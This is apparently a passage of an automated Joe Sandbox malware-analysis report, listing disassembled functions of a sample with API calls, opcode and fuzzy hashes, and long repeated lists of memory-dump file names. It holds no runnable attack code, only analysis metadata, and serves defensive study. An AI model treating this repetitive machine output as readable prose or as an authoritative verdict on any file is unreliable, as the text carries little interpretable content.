Associated: 00000000.00000002.2264250857.0000000000D7B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264297700.0000000000D80000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264363361.0000000000D81000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264454747.0000000000D84000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264485622.0000000000D94000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264514027.0000000000D97000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264579436.0000000000D9F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264617171.0000000000DA2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264666917.0000000000DA3000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264698485.0000000000DA5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264722936.0000000000DA6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264767282.0000000000DAA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264800781.0000000000DAC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264830770.0000000000DAD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264893177.0000000000DB4000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264925357.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264973602.0000000000DBD000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265002785.0000000000DBF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265074796.0000000000DD1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265152560.0000000000DD4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265152560.0000000000DF9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265238833.0000000000E2A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265272134.0000000000E2B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265294072.0000000000E2C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265322265.0000000000E30000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265346138.0000000000E32000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265370247.0000000000E41000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265391318.0000000000E43000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_file.jbxd

Yara matches

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 21dbb763b970d374fc568ab6fb6f56d72074ea88bd57ed5ad73ea9ea3eeefcb4
Instruction ID: 64dbbfeb186ba5c629d40b9f5c074509099c57022cd32e10a1d3bc28846cd30e
Opcode Fuzzy Hash: 21dbb763b970d374fc568ab6fb6f56d72074ea88bd57ed5ad73ea9ea3eeefcb4
Instruction Fuzzy Hash: 9DC08C2801362005FD1C153C21848A833C6D9877A87F41FC4E0794B2F1CA356C07A210

Function 00B287B0 Relevance: 1.5, APIs: 1, Instructions: 12COMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNEL32(?,00B2DA1D,?,?,?,?), ref: 00B287B9

Memory Dump Source

Source File: 00000000.00000002.2263048364.0000000000B21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.2263009079.0000000000B20000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263048364.0000000000B82000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263197124.0000000000B89000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263230633.0000000000B8B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263259717.0000000000B97000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263408061.0000000000CF8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263431405.0000000000CFA000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263469671.0000000000D14000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263469671.0000000000D22000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263534135.0000000000D25000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263567117.0000000000D27000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263592585.0000000000D28000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263621554.0000000000D2B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263658433.0000000000D3D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263686082.0000000000D3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263720268.0000000000D53000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263754240.0000000000D64000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264152445.0000000000D77000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264185231.0000000000D7A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264250857.0000000000D7B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264297700.0000000000D80000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264363361.0000000000D81000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264454747.0000000000D84000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264485622.0000000000D94000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264514027.0000000000D97000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264579436.0000000000D9F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264617171.0000000000DA2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264666917.0000000000DA3000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264698485.0000000000DA5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264722936.0000000000DA6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264767282.0000000000DAA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264800781.0000000000DAC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264830770.0000000000DAD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264893177.0000000000DB4000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264925357.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264973602.0000000000DBD000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265002785.0000000000DBF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265074796.0000000000DD1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265152560.0000000000DD4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265152560.0000000000DF9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265238833.0000000000E2A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265272134.0000000000E2B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265294072.0000000000E2C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265322265.0000000000E30000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265346138.0000000000E32000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265370247.0000000000E41000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265391318.0000000000E43000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_file.jbxd

Yara matches

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: dddbee7ed59a1688715590ddb8bebb45e069355bbff3ac903ab0a32ea880c70e
Instruction ID: b8a6b01e5f8615d0b4576c0ca9d0c65d90ac46a309207ee0b30f5ff2beb3c929
Opcode Fuzzy Hash: dddbee7ed59a1688715590ddb8bebb45e069355bbff3ac903ab0a32ea880c70e
Instruction Fuzzy Hash: 65C08C3801322046FA1C5A3C61848243286EA437283F00FC8E03A4B2F1CB32DC03C6A0

Function 00B2B1A0 Relevance: 1.5, APIs: 1, Instructions: 244COMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00B2B3C8

Memory Dump Source

Source File: 00000000.00000002.2263048364.0000000000B21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.2263009079.0000000000B20000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263048364.0000000000B82000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263197124.0000000000B89000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263230633.0000000000B8B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263259717.0000000000B97000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263408061.0000000000CF8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263431405.0000000000CFA000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263469671.0000000000D14000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263469671.0000000000D22000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263534135.0000000000D25000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263567117.0000000000D27000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263592585.0000000000D28000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263621554.0000000000D2B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263658433.0000000000D3D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263686082.0000000000D3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263720268.0000000000D53000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263754240.0000000000D64000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264152445.0000000000D77000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264185231.0000000000D7A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264250857.0000000000D7B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264297700.0000000000D80000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264363361.0000000000D81000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264454747.0000000000D84000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264485622.0000000000D94000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264514027.0000000000D97000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264579436.0000000000D9F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264617171.0000000000DA2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264666917.0000000000DA3000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264698485.0000000000DA5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264722936.0000000000DA6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264767282.0000000000DAA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264800781.0000000000DAC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264830770.0000000000DAD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264893177.0000000000DB4000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264925357.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264973602.0000000000DBD000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265002785.0000000000DBF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265074796.0000000000DD1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265152560.0000000000DD4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265152560.0000000000DF9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265238833.0000000000E2A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265272134.0000000000E2B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265294072.0000000000E2C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265322265.0000000000E30000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265346138.0000000000E32000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265370247.0000000000E41000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265391318.0000000000E43000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_file.jbxd

Yara matches

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: 53a04ac2cf705023e2619d924215063b84b2241ad984e2e670f5d0f64d3915f0
Instruction ID: 696ebaf9e306ac462154c6aaa9546305aed8731742f2b2375a10a80313b2abd2
Opcode Fuzzy Hash: 53a04ac2cf705023e2619d924215063b84b2241ad984e2e670f5d0f64d3915f0
Instruction Fuzzy Hash: 96B11670A10268DFEF29CF14C894BDEB7B5EF19304F5085D8E80967281D775AA88CF91

Function 04C90D7C Relevance: 1.3, Strings: 1, Instructions: 62COMMON

Download Yara Rule

Strings

uPR`, xrefs: 04C90D94

Memory Dump Source

Source File: 00000000.00000002.2268156536.0000000004C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c90000_file.jbxd

Similarity

API ID:
String ID: uPR`
API String ID: 0-3559325580
Opcode ID: 98285fb5113dc6738cfec41fa42b4ddca93641e589aacc5d5c843fb21a47b662
Instruction ID: 10d0c7ba7d36e9edf2717264a74e99ec10c619e28b3e994f261c1f21fc1b8288
Opcode Fuzzy Hash: 98285fb5113dc6738cfec41fa42b4ddca93641e589aacc5d5c843fb21a47b662
Instruction Fuzzy Hash: 4EF0C2DB2894503EA54240472A1C6F66BDFDBD77303388026E146C9A42EA952F5E7171

Function 04C90C7E Relevance: .1, Instructions: 119COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2268156536.0000000004C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c90000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2f37d79f4fb9b1306f5b60a15420e4a9fab11497e7a9f8517bfe3b847d51009b
Instruction ID: 076e58ed2954fad01bda56526cf82157e3b889da9153a60a943aa871685515f7
Opcode Fuzzy Hash: 2f37d79f4fb9b1306f5b60a15420e4a9fab11497e7a9f8517bfe3b847d51009b
Instruction Fuzzy Hash: 142181AB34E111BD7A1181473B18AFA27AFE7C6730738C827F807C5502E2946E5A7172

Function 04C90C99 Relevance: .1, Instructions: 110COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2268156536.0000000004C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c90000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9495147a75f65e52aa91244b433e4b43751f617c32bcc84d9d9a0d72e4bc9842
Instruction ID: a6f398bed6fb913a5ac85f0234f50bb1cf382148b89468f519a94aec222edd8b
Opcode Fuzzy Hash: 9495147a75f65e52aa91244b433e4b43751f617c32bcc84d9d9a0d72e4bc9842
Instruction Fuzzy Hash: D4116DEB24E011BDBA0185476B1CAFA2BAFD7C5730739C826F807C5406F2846E896176

Function 04C90CAF Relevance: .1, Instructions: 105COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2268156536.0000000004C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c90000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2e8cad196f0eb382dbd6577cfc411e8afbd9b0da8139f47aee82262f086ca409
Instruction ID: 993383ed0ec05c05e11d94c05ed655f0ebb76772de51a872a2eb6f5458a12ceb
Opcode Fuzzy Hash: 2e8cad196f0eb382dbd6577cfc411e8afbd9b0da8139f47aee82262f086ca409
Instruction Fuzzy Hash: 691151EB24D0117DB95284432B28AFA27EFE7D173073CC416F907C5501E2486E5A7172

Function 04C90CCA Relevance: .1, Instructions: 102COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2268156536.0000000004C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c90000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b93769c67c2eb356fcf4926f637439f835f4e62bcacf989bd7f56c26097a8234
Instruction ID: 5ce0438f46abced324159db4f1302efbaca87e16a54f2feed0fcb0176864d144
Opcode Fuzzy Hash: b93769c67c2eb356fcf4926f637439f835f4e62bcacf989bd7f56c26097a8234
Instruction Fuzzy Hash: 951160EB249161BEBA1280472B18AFA67AFD6C273073DC42AF907C5905E2482E5D6132

Function 04C90DA0 Relevance: .1, Instructions: 88COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2268156536.0000000004C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c90000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d56ffeed39f4c31ab0c0d92f09c81ec3ab5f9708a44c235ef1ca70ab57cb7c18
Instruction ID: 0b500f48ba22246ef122c11d321c3d4832e5572f43b251c41c13341c7b035327
Opcode Fuzzy Hash: d56ffeed39f4c31ab0c0d92f09c81ec3ab5f9708a44c235ef1ca70ab57cb7c18
Instruction Fuzzy Hash: 4F11C6EB28D1507EF50251572B29BF76BAED7C2730738851BF443C5542E1882E5E6131

Function 04C90D0C Relevance: .1, Instructions: 82COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2268156536.0000000004C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c90000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6e29183252490f5519fdd1e38124e6035ce1b6bbfc7c39bd7c28aafeb51dbd1e
Instruction ID: a24eb65bcc22fa56be822155a7bfc342e8c9e9f88a11f3a3c5c5d8a933dfd0e0
Opcode Fuzzy Hash: 6e29183252490f5519fdd1e38124e6035ce1b6bbfc7c39bd7c28aafeb51dbd1e
Instruction Fuzzy Hash: BC015EEB289011BDB65181873B18AFB67AFE6C5730779C427F807C5901E6882F9D6171

Function 04C90CFD Relevance: .1, Instructions: 81COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2268156536.0000000004C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c90000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 034e211245aff8ee1c10a1256382010ab7ecca9f2d0289563db1ba40200007d1
Instruction ID: 6fe988aea4876755761f13d9ce32db2ca55106c761b956dd12220452851044e9
Opcode Fuzzy Hash: 034e211245aff8ee1c10a1256382010ab7ecca9f2d0289563db1ba40200007d1
Instruction Fuzzy Hash: DC0171FB249115BEBA5185473B18AFB67AFE6C1730739C42BF807C4501E2882E8D7171

Function 04C90D15 Relevance: .1, Instructions: 78COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2268156536.0000000004C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c90000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 86feaea4f2fd3fcf1e33961e3f0af81d10719a551e013e3860859f730941087d
Instruction ID: 5f05f54d2f55c1210f82d2344b940c9b286b51fb44208ad84af062f51da6a9a0
Opcode Fuzzy Hash: 86feaea4f2fd3fcf1e33961e3f0af81d10719a551e013e3860859f730941087d
Instruction Fuzzy Hash: 41017CEB289011BDB95685477B18AFB67AEE6D173073CC827F807C4802E6882E9D6131

Function 04C90D3B Relevance: .1, Instructions: 74COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2268156536.0000000004C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c90000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e02f800295eebff8cdeb578a0788c073b77c0e4b385727d69e99c0437a0f1649
Instruction ID: e806ed13189867f62078469f4017ef09d16beb68334f9e9a933adae9ad9680e4
Opcode Fuzzy Hash: e02f800295eebff8cdeb578a0788c073b77c0e4b385727d69e99c0437a0f1649
Instruction Fuzzy Hash: BC018FEB2891117EB55141473B28AFB67AEE6C2730738C427F543C1542E2882E4E2132

Function 04C90D2E Relevance: .1, Instructions: 71COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2268156536.0000000004C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c90000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ab5114c86868e22e879013063b5d6db293a955935158c7c8ee02193d1ff04ab8
Instruction ID: 1e1efff85ab518aef9f7186438a0fab2d09d792ba6d6640de536ad66f84f9f32
Opcode Fuzzy Hash: ab5114c86868e22e879013063b5d6db293a955935158c7c8ee02193d1ff04ab8
Instruction Fuzzy Hash: EB0131EB2891117DB55281473B18AFB67AFE6C2730738C427F947C5905F6882E9D7131

Function 04C90D55 Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2268156536.0000000004C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c90000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e64160cba816e888b001164131e130f43e07d3e5c67fdf685dd075dd77148682
Instruction ID: 6f67eee140ef073483264584d0f624a57afd4f4340445f19ff6cfdaf8bccc643
Opcode Fuzzy Hash: e64160cba816e888b001164131e130f43e07d3e5c67fdf685dd075dd77148682
Instruction Fuzzy Hash: 70F04FFB2891117EB15581833719AFA6BAEE6C2730738C427F403C5502E6881E5D6172

Non-executed Functions

Function 00B631A8 Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1340COMMON

Download Yara Rule

APIs

__floor_pentium4.LIBCMT ref: 00B63323

Strings

1#QNAN, xrefs: 00B644C1
1#SNAN, xrefs: 00B644BA
1#IND, xrefs: 00B644B3
1#INF, xrefs: 00B644DE

Memory Dump Source

Source File: 00000000.00000002.2263048364.0000000000B21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.2263009079.0000000000B20000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263048364.0000000000B82000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263197124.0000000000B89000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263230633.0000000000B8B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263259717.0000000000B97000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263408061.0000000000CF8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263431405.0000000000CFA000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263469671.0000000000D14000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263469671.0000000000D22000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263534135.0000000000D25000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263567117.0000000000D27000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263592585.0000000000D28000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263621554.0000000000D2B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263658433.0000000000D3D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263686082.0000000000D3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263720268.0000000000D53000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263754240.0000000000D64000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264152445.0000000000D77000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264185231.0000000000D7A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264250857.0000000000D7B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264297700.0000000000D80000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264363361.0000000000D81000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264454747.0000000000D84000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264485622.0000000000D94000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264514027.0000000000D97000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264579436.0000000000D9F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264617171.0000000000DA2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264666917.0000000000DA3000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264698485.0000000000DA5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264722936.0000000000DA6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264767282.0000000000DAA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264800781.0000000000DAC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264830770.0000000000DAD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264893177.0000000000DB4000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264925357.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264973602.0000000000DBD000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265002785.0000000000DBF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265074796.0000000000DD1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265152560.0000000000DD4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265152560.0000000000DF9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265238833.0000000000E2A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265272134.0000000000E2B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265294072.0000000000E2C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265322265.0000000000E30000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265346138.0000000000E32000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265370247.0000000000E41000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265391318.0000000000E43000.00000080.00000001.01000000.00000003.sdmpDownload File

